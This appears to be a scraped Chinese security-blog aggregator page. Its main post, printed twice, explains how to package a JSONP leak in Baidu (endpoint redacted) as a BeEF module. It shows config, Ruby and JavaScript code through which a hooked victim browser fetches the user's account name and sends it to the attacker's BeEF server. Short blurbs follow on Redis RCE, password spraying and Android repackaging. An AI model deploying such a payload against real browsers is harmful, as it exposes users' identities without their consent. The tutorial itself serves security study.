失落的十年,写在McAfee二次IPO之前
上周有媒体报道McAfee计划重新IPO,笔者听到这个消息虽有点感触,却无一点意外,两年前TPG和Thoma
Aggregator
将挖掘出的JSONP泄漏漏洞整合进BEEF浏览器利用框架
5 years 4 months ago
0x00 前言
之前在█度上瞎逛的时候开着代理,顺手就找到了█度一个JSONP泄漏漏洞,能够泄漏完整用户名。
不得不说█度的安全真的烂,人家█讯跟它一个年代的,老代码照样很多,但我之前尝试了谷歌上能找到的大部分页面,各种老系统边缘业务都试过了,就只找到一个能泄漏QQ名的漏洞,而█度随便逛逛就能撞到漏洞。建议█度安全部的人自己给自己泼█宝矿泉水自裁谢罪
(本文不会贴出具体的漏洞,如果只是想看█度漏洞的可以退了)
很快,我就构建了个POC能够alert出用户名。我就开始疯狂YY能不能做一个取证溯源系统,挂一个JS就能查到各种信息。
但是我突然隐约记起来,好像有个叫做BEEF的框架已经能将各种欺负浏览器的技巧集成在它的框架里面了,仔细一看这玩意着实厉害,凭我个人无限趋近于零的水平不可能做出更好的来。所以本着不能打败敌人那就加入敌人的无耻精神,我打开BEEF开始研究如何自己写一个BEEF的插件将这个漏洞整合进去
0x01 BEEF插件编写
BEEF官方在他们的gayhub页面上给出了开发模块的方法,不过就只有这一页很多东西根本就没有讲清楚,而且用的还是本人不熟悉的ruby,在编写的时候踩了不少坑
先说下BEEF插件长啥样
BEEF的插件存在/usr/share/beef-xss/modules/exploits/baidu_account/下面的文件夹里面,每个文件夹代表了一个"category",即不同类别的模块,比如社会工程,持久化,漏洞利用,网络拓扑信息搜集之类的。说实在的,这让我联想到了MSF,同样是ruby写的,同样喜欢用文件夹把不同的模块区别开来(还有同样语焉不详的奇妙文档)。
但是不同之处在于,BEEF的每个模块又得装在这个category的子文件夹里面,比如我今天要编写的模块名字叫做baidu_account,归类在Exploits里面。那这个模块的目录就得是/usr/share/beef-xss/modules/exploits/baidu_account/。为什么是目录呢?读者可能已经猜到了,BEEF的每个模块需要多个文件。
一个标准的BEEF模块由三个文件组成
beef: module: baidu_account: enable: true category: "Exploits" name: "get Baidu account" description: "通过JSONP漏洞获取█度帐号名" authors: ["APU"] target: working: ["ALL"] 开头的beef:和module:是起手式,大部分模块的开头都是这个,这个意思是定义一个模块。西面这个需要和你模块的文件夹名字相同不然会出现莫名其妙的错误。enable定义这个模块是否被启用,我们当然选择true。category选择Exploits,在这里需要注意,category不能乱写,不能自己新建一个文件夹尝试新建一个category否则运行会失败或者无法添加模块,如果有人直到怎么新建category请告诉我。name就是模块的名字,description就是描述,authors是作者,这里是一个list(不是很熟悉ruby,不知道术语说对了没)应该是允许一个模块对应多个作者的,target是对应的浏览器,target的格式可以在刚才的链接里面看到我就不详细讲了
写完这个文件之后就要写module.rb了,我再贴上代码来
class Baidu_account < BeEF::Core::Command # This method will be called when BeEF will receive an answer from the hooked browser def post_execute content = {} content['Baidu_account'] = @datastore['Baidu_account'] save content end end 在这里我们需要定义一个类,用于后端的处理。类中可以定义三个函数,self.options,pre_send,post_execute。即参数,发送前的准备,发送后的准备。类名虽然没有具体规范,但是我看到的插件都是把文件夹名字大写作为类名。由于我这里jsonp漏洞利用主要是需要在利用之后接收参数,所以只定义post_execute。
对于BEEF,想要接收受害者上传的参数应该使用@datastore,这个@datastore储存了受害机发上来的数据,至于是怎么发的我们先不用关心,只需要知道它能从这里面取参数就可以了。取到了参数我们还需要储存,因此我们需要使用save 来储存参数。我代码中储存数据的语句是save content。这个content是之前定义的一个字典,用于接收上传的参数的
最后我们需要做的就是写我们的核心command.js了,我这里把打了码的command.js发上来
function getbaiduaccount(data) { username=data['username']; beef.net.send("<%= @command_url %>", <%= @command_id %>, "Baidu_account="+username); } beef.execute(function() { beef.dom.loadScript("█度神秘JSONP接口"); }); BEEF官方声称我们必须把payload放在beef.execute函数内来执行,但是我在这个函数之外定义callback函数也是ok的。BEEF官方提供了许多函数来支持我们的各种操作,唯一的问题就是他们的迫真文档只列出了名字,功能我们得自己猜。不过我这里蛮幸运的,用Chrome的调试一找就找到了这里的loadScript函数,这样就能用这个函数加载JSONP的接口。在callback函数中,我们需要把辛辛苦苦拿到的数据传回去,这里就要用到beef.net.send函数了
这个函数是这么调用的beef.net.send("<%= @command_url %>", <%= @command_id %>, "data");其中data就是我们要传回去的东西,其中data是个字符串,传输的数据格式跟平时URL传参没啥区别,就是“参数名1=值1&参数名2=值2....”
最后要说的坑就是首先每次打开BEEF的时候BEEF应该已经加载完了插件,你再修改也不会变除非重启BEEF。这个困扰了我很久,之前我一直调试不对,后来才发现其实不重启程序根本没有变化。还有就是之前我模块命名不规范,瞎搞了一会删掉之后WEB端还显示那个模块,那是因为/usr/share/beef-xss/db/beef.db有缓存,需要删掉才能刷新
0x02 展示图片
0x03最后再指点江山几句 最近发现一大堆人都喜欢造什么漏洞利用框架,每个界面都花里胡哨的,仔细一看无非就是调用python脚本去扫描别人统一管理,实际上并不实用。本人以为成功的漏洞利用框架首先是得研究的早,比如metasploit就抢占了先机,算是最先搞漏洞利用框架的几个,现在就发展的很好。还有就是框架之所以叫做框架除了暗示这些利用能被统一管理之外,还需要能够给模块编写者提供一些支持,帮助模块开发者完成一些重复琐碎的事项,减少模块编写者的工作量,不然只能算个漏洞利用集合不算优秀的框架。那些优秀的框架,比如metasploit的shellcode统一管理就很好,从此写二进制EXP的人就能减少很多编shellcode的工作量,进而把核心放在漏洞上。再比如今天看见的BEEF框架就能够很轻松地解决数据回传问题,不需要像https://lcx.cc/post/4595/里面从头开始写个专门收数据的后端。希望这个也能给想要编写XX框架的人一些思考
- config.yaml : 用于描述该模块相关信息的YAML文件
- module.rb :个人理解是我们控制端的“后端”文件,用于
- command.js :发给受害者执行的payload
beef: module: baidu_account: enable: true category: "Exploits" name: "get Baidu account" description: "通过JSONP漏洞获取█度帐号名" authors: ["APU"] target: working: ["ALL"] 开头的beef:和module:是起手式,大部分模块的开头都是这个,这个意思是定义一个模块。西面这个需要和你模块的文件夹名字相同不然会出现莫名其妙的错误。enable定义这个模块是否被启用,我们当然选择true。category选择Exploits,在这里需要注意,category不能乱写,不能自己新建一个文件夹尝试新建一个category否则运行会失败或者无法添加模块,如果有人直到怎么新建category请告诉我。name就是模块的名字,description就是描述,authors是作者,这里是一个list(不是很熟悉ruby,不知道术语说对了没)应该是允许一个模块对应多个作者的,target是对应的浏览器,target的格式可以在刚才的链接里面看到我就不详细讲了
写完这个文件之后就要写module.rb了,我再贴上代码来
class Baidu_account < BeEF::Core::Command # This method will be called when BeEF will receive an answer from the hooked browser def post_execute content = {} content['Baidu_account'] = @datastore['Baidu_account'] save content end end 在这里我们需要定义一个类,用于后端的处理。类中可以定义三个函数,self.options,pre_send,post_execute。即参数,发送前的准备,发送后的准备。类名虽然没有具体规范,但是我看到的插件都是把文件夹名字大写作为类名。由于我这里jsonp漏洞利用主要是需要在利用之后接收参数,所以只定义post_execute。
对于BEEF,想要接收受害者上传的参数应该使用@datastore,这个@datastore储存了受害机发上来的数据,至于是怎么发的我们先不用关心,只需要知道它能从这里面取参数就可以了。取到了参数我们还需要储存,因此我们需要使用save 来储存参数。我代码中储存数据的语句是save content。这个content是之前定义的一个字典,用于接收上传的参数的
最后我们需要做的就是写我们的核心command.js了,我这里把打了码的command.js发上来
function getbaiduaccount(data) { username=data['username']; beef.net.send("<%= @command_url %>", <%= @command_id %>, "Baidu_account="+username); } beef.execute(function() { beef.dom.loadScript("█度神秘JSONP接口"); }); BEEF官方声称我们必须把payload放在beef.execute函数内来执行,但是我在这个函数之外定义callback函数也是ok的。BEEF官方提供了许多函数来支持我们的各种操作,唯一的问题就是他们的迫真文档只列出了名字,功能我们得自己猜。不过我这里蛮幸运的,用Chrome的调试一找就找到了这里的loadScript函数,这样就能用这个函数加载JSONP的接口。在callback函数中,我们需要把辛辛苦苦拿到的数据传回去,这里就要用到beef.net.send函数了
这个函数是这么调用的beef.net.send("<%= @command_url %>", <%= @command_id %>, "data");其中data就是我们要传回去的东西,其中data是个字符串,传输的数据格式跟平时URL传参没啥区别,就是“参数名1=值1&参数名2=值2....”
最后要说的坑就是首先每次打开BEEF的时候BEEF应该已经加载完了插件,你再修改也不会变除非重启BEEF。这个困扰了我很久,之前我一直调试不对,后来才发现其实不重启程序根本没有变化。还有就是之前我模块命名不规范,瞎搞了一会删掉之后WEB端还显示那个模块,那是因为/usr/share/beef-xss/db/beef.db有缓存,需要删掉才能刷新
0x02 展示图片
0x03最后再指点江山几句 最近发现一大堆人都喜欢造什么漏洞利用框架,每个界面都花里胡哨的,仔细一看无非就是调用python脚本去扫描别人统一管理,实际上并不实用。本人以为成功的漏洞利用框架首先是得研究的早,比如metasploit就抢占了先机,算是最先搞漏洞利用框架的几个,现在就发展的很好。还有就是框架之所以叫做框架除了暗示这些利用能被统一管理之外,还需要能够给模块编写者提供一些支持,帮助模块开发者完成一些重复琐碎的事项,减少模块编写者的工作量,不然只能算个漏洞利用集合不算优秀的框架。那些优秀的框架,比如metasploit的shellcode统一管理就很好,从此写二进制EXP的人就能减少很多编shellcode的工作量,进而把核心放在漏洞上。再比如今天看见的BEEF框架就能够很轻松地解决数据回传问题,不需要像https://lcx.cc/post/4595/里面从头开始写个专门收数据的后端。希望这个也能给想要编写XX框架的人一些思考
DriverTom
WCTF2019 pdoor Review
5 years 4 months ago
brief desc
这里提供官方的题目 https://github.com/paul-axe/ctf
今年 WCTF 还是被按在地上摩擦,就 pdoor 这个题目来说,感觉是相当值得多思考几遍
xmsec
Get Cross-Functional: Learn to Let Go and Embrace DevSecOps
5 years 4 months ago
F5 Labs' Preston Hogue writes for SecurityWeek, explaining how you as a security professional are a source of friction - and therefore risk - and what to do about it.
Redis基于主从复制的RCE 4.x/5.x 复现 - PaperPen
5 years 4 months ago
对Redis的RCE进行的一次详细的复现流程
PaperPen
Equities process
5 years 4 months ago
Publication of the UK’s process for how we handle vulnerabilities.
Pykspa v2 DGA updated to become selective
5 years 4 months ago
Additional research and information provided by Asaf Nadler Recent changes to the Pykspa v2 domain generation algorithm (DGA) have made it more selective. Akamai researchers have tracked these changes and believe that part of the reason for selective domain generation...
Lior Lahav
Protecting parked domains for the UK public sector
5 years 4 months ago
Non-email sending (parked) domains can be used to generate spam email, but they're easy to protect.
jar包中存在包名和类名都相同的情况 - 羊小弟
5 years 4 months ago
情况: 在maven中引入两个包都有项目的包名和类名,只是jar包的名字不同。两个包的一部分在代码中的不同地方都需要用到。 网上找的大部分都是: 只有改变编译器优先选择的jar顺序(这个顺序是可以改变的):包jdk放到前面就好了。 解决: 在maven中也是这样,只要调整好dependency的顺序
羊小弟
What Is the CIA Triad?
5 years 4 months ago
Understanding the significance of the three foundational information security principles: confidentiality, integrity, and availability.
NSX-T vs. NSX-V ? Key Differences and Pitfalls to Avoid
5 years 4 months ago
Learn the difference between VMware?s segmentation offerings, NSX-T vs NSX-V, and understand the several potential pitfalls that are important to consider before deployment.
Dave Burton
150亿美元的王朝过客,从Symantec的前世今生谈起
5 years 4 months ago
严格来说,这其实是Symantec的第二次被并购。大马华裔陈福阳带领的Broadcom传出150亿美元价格并
世界的模样——毕业总结
5 years 4 months ago
关于成电的季节里,我最喜欢的便是夏天。那是我初入校
190705 安卓-对抗AndResGuard的重打包
5 years 4 months ago
换了一个apk实验后
apktool b -f -p. xxx也不行,仍然报资源错误
看了一下可能是鹅厂出的AndResGuard工具,会将资源文件夹/Res/xxx重命名为/r/x类的目录,导致资源解析出错
针对这个混淆有shakaApktool来对抗,但由于太久没有更新所以已经失修了
于是无奈回归apktool -r不解析资源文件、原样打包的思路
对于AndroidManifest.xml的二...
whklhhhh
Fiddler如何自动修改请求和响应包 - bamb00
5 years 4 months ago
Charles的Map功能可以将某个请求进行重定向,用重定向的内容响应请求的内容。这个功能非常方便。在抓包过程当中,有时候为了调试方便,需要将线上的服务定位到内网。比如我们线上的服务器域名为 api.example.com,而内网的用于调试的服务器域名为 test.neiwang.com,那么就需要
bamb00
BashSpray - Simple Password Spray Bash Script
5 years 4 months ago
One thing every red team should attempt early on and regularly is to perform some password spray testing across their organization to identify and help remediate usage of weak passwords.
In the past I have done this on Windows a lot, but now I built a simple version for it for Bash to run it also from a Mac.
Check it out: Bash Spray
Ideally, a script like bashspray.sh is integrated into your response pipelines, and SOC, Blue Team as well as account owner get notified - so they change their password right away, and any SOC investigation can be performed if necessary.
What To Do When Your Company Tells You They're Making a Mobile App, Part 3
5 years 4 months ago
In the final part of our mobile app series, we cover the DevSecOps components related to mobile app security: rolling out requirements, training, testing, and operational practices.
彦宏获水、廉价热搜、417.74亿的某度与2块的某宝
5 years 4 months ago
认真点,我是来看热闹的~
New Golang Malware is Spreading via Multiple Exploits to Mine Monero
5 years 4 months ago
A newcomer to the malware scene, Golang-based malware has been seen installing cryptominers specifically targeting Moreno cryptocurrency.
190702 安卓-Frida-gadget
5 years 4 months ago
开始鹅厂实习的社畜搬砖生活(°∀°)ノ
frida-gadget的优势在于通过对应用重打包,加入gadget.so的调用,从而实现frida的hook
这种途径避免了注入所需要的root权限
发现了一个现成的脚本,但测了一下似乎有一些问题,明天修一下看看
以下是手动流程
解包
apktool d xxx.apk
-r选项可以使得不解析资源,但AndroidManifest.xml也不会解析,此时无...
whklhhhh